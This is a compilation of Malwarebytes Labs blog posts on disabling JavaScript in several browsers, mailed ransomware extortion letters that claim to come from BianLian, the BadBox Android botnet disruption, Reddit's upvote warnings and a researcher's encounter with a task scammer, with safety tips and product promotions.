Toggle the switch to Don’t allow sites to use JavaScript to Disable JavaScript for all sites. You can also add specific sites to block or allow JavaScript by clicking on Add under the Block or Allow sections.

How to disable JavaScript in Firefox

• Open Firefox and click on the menu button (three horizontal lines) in the top right corner.
• Select Settings from the dropdown menu.
• Scroll to the Privacy & Security panel on the left side.
• Find the Permissions section and locate the JavaScript setting.
• Uncheck the box next to Enable JavaScript to disable JavaScript.
• Restart Firefox if necessary for the changes to take effect.

How to disable JavaScript in Opera

• Launch Opera and click on the settings icon.
• Select Privacy & Security from the options.
• Click on Site Settings.
• Select the JavaScript option.
• Choose Don’t allow sites to use JavaScript to disable JavaScript for all sites.

To disable JavaScript for specific sites, click Add under the Not allowed to use JavaScript section and enter the site’s URL.

How to disable JavaScript in Edge

• Open Microsoft Edge and click on the three-dot menu icon in the top right corner.
• Select Settings from the dropdown menu.
• In the left sidebar, click on Cookies and Site Permissions.
• Scroll down to the All Permissions section and select JavaScript.

Toggle the switch to disable JavaScript. You can also manage JavaScript settings for individual sites by adding them to the allow or block lists.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Last week on Malwarebytes Labs:

• TikTok: Major investigation launched into platform’s use of children’s data
• PayPal scam abuses Docusign API to spread phishy emails
• Android zero-day vulnerabilities actively abused. Update as soon as you can
• I spoke to a task scammer. Here’s how it went
• Android botnet BadBox largely disrupted
• Ransomware threat mailed in letters to business owners
• Reddit will start warning users that upvote violent content

Last week on ThreatDown:

• Phishers go “interplanetary” to get company login credentials

Stay safe!

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Malwarebytes Premium Security has once again been awarded “Product of the Year” after successfully blocking 100% of “in-the-wild” malware samples. The samples were deployed in multiple, consecutive third-party tests conducted by the AVLab Cybersecurity Foundation. 

AVLab commended Malwarebytes for “providing effective detection and removal of many types of malware, including recovery from cyberattacks”. 

The recognition cements Malwarebytes Premium Security’s perfect record of repeatable, trusted, and proven protection for users. It also comes with an additional AVLab certification for “Top Remediation Time”.

The latest results are part of AVLab’s regular “Advanced In-The-Wild Malware Test”.

In 2024, AVLab tested 3,103 unique malware samples against 14 cybersecurity products. Malwarebytes Premium Security detected 3,103 out of 3,103 malware samples, with a remediation time of 17.1 seconds—almost 26 seconds faster than the industry average. 

ThreatDown, powered by Malwarebytes, also participated in AVLab’s evaluation, where it similarly blocked 100% of malware samples with a remediation time of 13.7 seconds. 

AVLab’s evaluations, which are performed every other month by a team of cybersecurity and information security experts, are constructed to test and compare cybersecurity vendors against the latest malware. To ensure the evaluations reflect current cyberthreats, each round of testing follows three steps: 

1. Collecting and verifying in-the-wild malware: AVLab regularly collects malware samples from malicious and active URLs, testing the malware samples to understand their impact to networks and endpoints. 

2. Simulating a real-world scenario in testing: To recreate how a real-life cyberattack would occur, AVLab uses the Firefox web browser to engage with the known, malicious URLs collected in the step prior. In the most recent test, AVLab emphasized the potential for these URLs to be sent over instant messaging platforms, including Discord and Telegram. 

3. Incident recovery time assessment: With the various cybersecurity products installed, AVLab measures whether the evaluated product detects a malware sample, when it detects a sample, and how long it took to detect that sample. The last metric is referred to as “Remediation Time.” 

Malwarebytes is proud to receive “Product of the Year” and “Top Remediation Time” from AVLab, and is thankful to the third-party tester for its important work in the industry. 

In a post on r/RedditSafety by a Reddit administrator, the platform announced that it will start sending warnings to users that upvote violent content.

Reddit is a social media platform and online forum where users can share and discuss content across a wide range of topics. The platform’s structure divides it into communities known as “subreddits,” each focused on a specific subject or interest (from cars to movies to sports to knitting). Users can submit posts, which can be links, text, images, or videos, and other users can vote on these posts using “upvotes” or “downvotes.” The voting system determines the visibility of posts, with highly upvoted content appearing at the top of subreddits and potentially reaching the site’s front page.

For now, the new enforcement action will be limited to users that regularly upvote violent content and the repercussions will be limited to a warning, but it’s not unthinkable that the platform may decide firmer measures are necessary, and the scope of the warnings may also be widened to other bad or violating content.

Some subreddits have additional rules about which content is allowed, but this new policy is a global one. In the discussion following the announcement, the administration promised to check whether a user upvoted an edited post, to avoid sending a warning to users that did not see the offending content when they cast their vote.

Before this new enforcement action, Reddit already acted based on rules against violent content, which prohibit content that encourages, glorifies, incites, or calls for violence or physical harm against individuals or groups. But the actions only affected the actual posters and not the users engaging with the content.

But as Reddit points out, the culture of a community is not just the posts themselves, but also the interaction that the posts initiate.

“Voting comes with responsibility. This will have no impact on the vast majority of users as most already downvote or report abusive content. It is everyone’s collective responsibility to ensure that our ecosystem is healthy and that there is no tolerance for abuse on the site.”

Given the recently announced investigation by the UK’s Information Commissioner’s Office (ICO) focusing on the content that platforms like TikTok, Imgur, and Reddit show to young users, this is likely an initiative to improve the quality of the promoted content.

There are a lot of questions about this new enforcement action and how it will be implemented, and it will probably take a while before everyone is comfortable with what will be allowed or not. But if the end-result is a platform with less offensive content, then that’s a good thing.

We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

Business owners and CEOs across the United States received customized ransomware threats this month from the most unusual of places—letters in the mail.

The letters, which were first reported by multiple cybersecurity researchers, claim to come from a ransomware group called BianLian. But since Malwarebytes first started tracking BianLian nearly one year ago, our intelligence analysts have never seen the cybercriminal gang resort to sending physical letters to make their ransom demands, suggesting that the latest snail mail campaign could be the work of copycats.

The threat, however, is still quite real, especially for small business owners who rely either on themselves or contracted IT services to investigate any technical problems.

According to multiple examples discovered by researchers, the letters in this likely hollow threat were sent through the US Postal Service. The envelopes containing the letters are stamped with the words “TIME SENSITIVE READ IMMEDIATELY” and have the following return address listed:

BianLian Group
24 Federal St, Suite 100
Boston, MA, 02110

The letters themselves lobby a variety of urgent threats to their recipients: Their corporate network has been compromised, sensitive customer and employee data has been stolen, and there is immediately a 10-day deadline to pay a cryptocurrency ransom before the cybercriminals leak the stolen data online.

These threats are standard for ransomware groups today, especially those that have pivoted to not only encrypting a company’s data, but stealing it in the process of an attack to use as further leverage to extort a ransom payment. In fact last year, Malwarebytes wrote about BianLian abusing a common Microsoft tool to avoid cybersecurity detection while storing massive quantities of stolen data from victims.

But the similarities between the threats included in the letter and the recorded actions of BianLian end there. The letter senders claim that they “no longer negotiate with victims,” which is a rarity from ransomware gangs. In fact, the practice is so normalized that a cottage industry of ransomware “negotiators” has popped up to help victims caught in an attack. The letters themselves, researchers said, also include few grammatical errors and better sentence structure than a typical BianLian ransomware note.

One of the letters, in full, begins:

Dear [REDACTED]

I regret to inform you that we have gained access to [REDACTED] systems and over the past several weeks have exported thousands of data files, including customer order and contact information, employee information with IDs, SSNs, payroll reports, and other sensitive HR documents, company financial documents, legal documents, investor and shareholder information, invoices, and tax documents.

Interestingly, researchers noticed that some of the letters were customized based on their recipient. If a letter was sent to a healthcare CEO, for instance, the letter warned about the theft of patient data; if the letter was sent to a CEO of a product maker, the letter warned about breached customer orders and employee data.

The amounts demanded by the letters varied reportedly from $250,000 to $350,000.

While a “physical” cyberthreat may sound silly, these letters could cause significant harm to small and growing businesses.

These personalized letters convincingly threaten network compromise, password abuse, employee exploitation, and data theft, which can be difficult to verify for any lean organization. Think about it this way: If an everyday person would struggle to check whether their home router had been compromised, many small business owners would struggle to do the same regarding their corporate infrastructure, and that’s through no fault of their own.

If you receive one of these letters in the mail, notify your IT or security team immediately. They can provide the investigation necessary to verify the security of your business.

Whether you have dedicated IT staff or not, you can protect your small business with Malwarebytes Teams, which prevents malware attacks and notifies you about suspicious activity on your network.

Removing 24 malicious apps from the Google Play store and silencing some servers almost halved a botnet known as BadBox.

The BadBox botnet focuses on Android devices, but not just phones. It also affects other devices like TV streaming boxes, tablets, and smart TVs.

The German BSI (Federal Office for Information Security) started the disruption campaign in December by blocking the malware on 30,000 devices. BadBox is referred to as a botnet, because one of its capabilities is to set up the affected device to act as a proxy, allowing other people to use the device’s internet bandwidth and hardware to route their own traffic.

This traffic can for example serve in DDoS attacks or as a platform to spread fake news and disinformation. But BadBox can also steal two-factor authentication (2FA) codes, install further malware, and perform ad fraud.

Unfortunately, the 30,000 devices cut off by the BSI were only the tip of the iceberg. Estimates say there may be as many as one million affected devices. These devices have not necessarily been infected by installing malicious apps. It’s been suggested that Chinese manufacturers hide firmware backdoors in their devices, BadBox being one of them.

The BSI said it found:

“The BadBox malware was already installed on the respective devices when they were purchased.”

According to Satori Threat Intelligence researchers:

“Devices connected to the BADBOX 2.0 operation included lower-price-point, “off brand”, uncertified tablets, connected TV (CTV) boxes, digital projectors, and more. The infected devices are Android Open Source Project devices, not Android TV OS devices or Play Protect certified Android devices.”

Off brand devices are devices which do not carry any specific brand name that you might recognize. They are often cheap and made by small manufacturers.

Following the botnet’s development after the German disruption, the researchers found new Command and Control (C2) servers which hosted a list of APKs targeting Android Open Source Project devices similar to those impacted by BadBox.

As part of the disruptions, the servers that were controlling the botnet have been sinkholed, which basically means that the traffic between those servers and the botnet clients gets redirected so it will no longer arrive at the intended destination.

How to stay safe

This disruption will likely not be the end of the story. The botnet operators will adapt again and rebuild their infrastructure. Given their supply chain of compromised devices the botnet will resurface soon enough.

So here are a few things you can do:

• Check you don’t have the apps ‘Earn Extra Income’ and ‘Pregnancy Ovulation Calculator’, which had over 50,000 downloads each. You can recognize the malicious apps from the publisher name Seekiny Studio. If you find them on your device, remove them immediately.
• Protect your Android devices with an active security solution that can remove malicious apps and block malicious traffic.
• Google Play Protect automatically warns users and blocks apps known to exhibit BadBox 2.0-associated behavior at install time on Play Protect certified Android devices with Google Play Services. If a device isn’t Play Protect certified, carefully study its origin before purchasing it.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Tasks scam are surging, with a year over year increase of 400%. So I guess it should have been no surprise when I was contacted by a task scammer on X recently.

Task scammers prey on people looking for remote jobs by offering them simple repetitive tasks such as liking videos, optimizing apps, boosting product interest, or rating product images. These tasks are usually gamified—organized in sets of 40 tasks that will take the victim to a “next level” once they are completed. Sometimes the victim will be given a so-called double task that earns a bigger commission.

The scammers make the victim think they are earning money to raise trust in the system. But, at some point, the scammers will tell the victims they have to make a deposit to get the next set of tasks or get their earnings out of the app. Victims are likely to make that deposit, or all their work will have been for nothing.

So when the task scammer contacted me on X to offer me a nice freelance job, I was keen to see where it would take me.

Beginning the message with emojis, Birdie started the chat…

Group invitation on X

“[emoji intro] Hello, I am a third-party agency from the UK, specializing in providing ranking and likes services for Booking+Airbnb hotel applications. The company is now recruiting freelancers worldwide. You only need a mobile phone to easily get it done, and the time and location are flexible. The daily salary is 100-300€, and the monthly salary of formal employees is 3000-10000€. Note (this article is not suitable for students under 22 years old, and African and Indian employees cannot be hired due to remittance issues) For more details please see the WhatsaPP link: [shortened bit.ly URL]”

In this case, I was asked to contact the scammer on WhatsApp, but I’ve also seen the same campaign asking the victims to reach out on Telegram.

Invitation to a Telegram conversation

The Telegram invitation was a bit more limited (European and American female users only) but extended to a larger group of 150 accounts on X. What the ones that reached out to me had in common was that they all found my profile on X. Mind you, my profile is not some honeytrap, it clearly says I blog for Malwarebytes.

So, last week I was up for some distraction and decided to follow up on the WhatsApp invitation which was still live. I reset an old phone to factory settings and bought a burner SIM card. With that phone in hand, I set up a Gmail account and installed WhatsApp. I added Birdie Steuber to my contacts with the phone number I found by following the URL. Then I reached out asking if they still had openings.

The bait was taken within minutes: hook, line, and sinker.

introductions

So, Birdie is actually Tina from Sheffield in the UK. The job is available and does not require any special skills or experience. Tina tells me all you need is internet access and you can start working for booking.com.

Next is a long-winded explanation of what the job entails with another mention of the fortune you can make. I suspect the explanation is meant to be slightly confusing, knowing the general population would be embarrassed to ask for a better explanation and just will go ahead and carry out the tasks.

explanation?

More explanations about the job are followed by a quick query whether I will be able to buy USDT, the “hottest cryptocurrency in the world” as Tina described it. (It isn’t.)

USDT required

Tina then asks me to create an account on a fake booking.com website.

create an account on a fake booking(dot)com site

Here’s that site.

the fake booking site

Once I’d set that up, Tina set me up with a training account to learn the tasks. The actual tasks consist of clicking two buttons labelled “Start task” and “Submit” which gets mind-numbing really quick. But, hey, I was wasting a scammers’ time, so it was worth it.

That training account had a balance of over 1,000 USDT, probably to make the victim even more interested.

balance training account

What happened next is likely a demonstration of another tactic the scammers will use to get people to deposit more USDT: A lucky order!

lucky order

I was shown a prompt that I had run into “a 4% lucky order”, which Tina called a merge task that rendered a 4% commission.

Next followed an elaborate explanation on how Tina had to top up the balance to make up for the negative “Pending Amount” and asked me to contact customer support for instructions.

negative pending amount needs to be topped up

But to my surprise this was not what I was asked to do the next day when we continued our conversation. However, Tina quickly revealed how they were expecting to get 100 USDT from me.

“I forgot to tell you, it takes 100usdt to complete a new round of 40/40 orders to reset 40 new orders. Because 100usdt is to optimize the hotel 100usd reservation fee. Once you complete the 40/40 order task you can withdraw all funds. This is to help the hotel increase the number of real bookings and exposure to earn commission income. The commission income per order is 0.5 per cent. 100usdt will probably get 40-60usdt after completing the 40/40 order task.”

After I completed my first 40 tasks, I was shown this notification letting me know I had reached the maximum number of tasks for the day, at which point I was expected to top op my account at my own expense.

Please contact customer service to recharge and refresh the task

Once I convinced Tina we had purchased 100 USDT, I was told to contact customer support for instructions.

The instructions were similar to the ones I received a day earlier. But at this point I had to terminate because I didn’t want to give the scammers any actual money.

Checking the balance on the account numbers they provided me with during our conversation showed there are likely others who are handing over money. And they very well may have many more accounts.

balance in the USDT accounts belonging to the scammers

These scams are likely designed to be confusing. The actual tasks were nowhere near as difficult as the explanation of what the job entailed.

In the end I revealed to Tina that I was the one that wrote an article about task scams, but Tina did not give up that easily. She kept trying to convince me there was money to be made.

If you’d like to read the whole conversation I had with Tina you can find it here.

How to avoid task scams

As I pointed out, all the task scam invitations I received came to me in the form of Message requests on X. So, that’s a good place to be very cautious. Once you know the red flags, it is easier to avoid falling for task scams.

• Do not respond to unsolicited job offers via text messages or messaging apps
• Never pay to get paid
• Verify the legitimacy of the employer through official channels
• Don’t trust anyone who offers to pay you for something illegal such as rating or liking things online

It’s also important to keep in mind that legitimate employers do not ask employees to pay for the opportunity to work. And as with most scams, if it sound to good to be true, it probably is.

If you run into a task scam, please report them to the FTC at ReportFraud.ftc.gov. 

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.